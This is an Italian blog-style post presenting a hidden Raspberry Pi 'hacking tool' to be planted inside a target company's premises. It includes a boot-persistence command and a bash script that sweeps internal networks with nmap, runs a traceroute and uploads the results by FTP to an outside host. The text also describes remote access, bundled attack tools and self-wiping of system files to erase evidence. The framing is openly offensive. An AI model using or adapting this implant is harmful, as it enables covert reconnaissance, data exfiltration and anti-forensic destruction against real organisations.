SCAN INSIDE (1st hacking tool)

Testare la sicurezza di una rete oggi è fondamentale. Ho realizzato uno strumentino che può essere utilizzato da un malintenzionato che ha accesso all'azienda che intende colpire. E' un oggetto che sta nel palmo di una mano, non necessita di alimentazione esterna e può essere nascosto facilmente sotto una scrivania, dietro a una stampante, in una sala riunioni vuota... SCAN INSIDE è un Raspberry PI 3+ un Power Bank per cellulari. All'avvio lancia uno script che fa la scansione degli IP di 50 possibili reti LAN (molto probabilmente tra queste ci sarà la vostra), fa un traceroute verso i DNS google, scrive i risultati in un file e lo trasmette via FTP su un sito esterno fornendoci una mappa chiara e dettagliata di cosa c'è da rubare e di come è fatta l'architettura interna, per cercare di bucare la rete.Su SCAN INSIDE ci si può collegare tramite VNC e SSH e contiene pacchetti come Wireshark, Metalsploit, Ghost Phisher, Fern, Zenmap per poter lanciare degli attacchi dall'interno. Una volta terminato il suo lavoro può essere pericoloso il recupero per cui in automatico cancella i file di sistema di Linux rendendo inutile qualsiasi tentativo di accesso successivo garantendoci l'anonimato. La vittima troverà solamente un Raspberry inutilizzabile.

nano /etc/init.d/rc.local e aggiungere ./home/pi/script.sh

Esempio di Script:
#!/bin/bash

echo "Reading data from your network..."
nmap -sn 192.168.1-50.* >> export.txt
traceroute -4 4.4.4.4 >> export.txt
echo "Done"

HOST='ftp.******.***'
USER='*****@*****.**'
PASSWD='*********'
FILE='export.txt'

ftp -n $HOST <<END_SCRIPT
quote USER $USER
quote PASS $PASSWD
cd ************.com
put $FILE
quit
END_SCRIPT
exit 0


SCARICA LA MIA APPLICAZIONE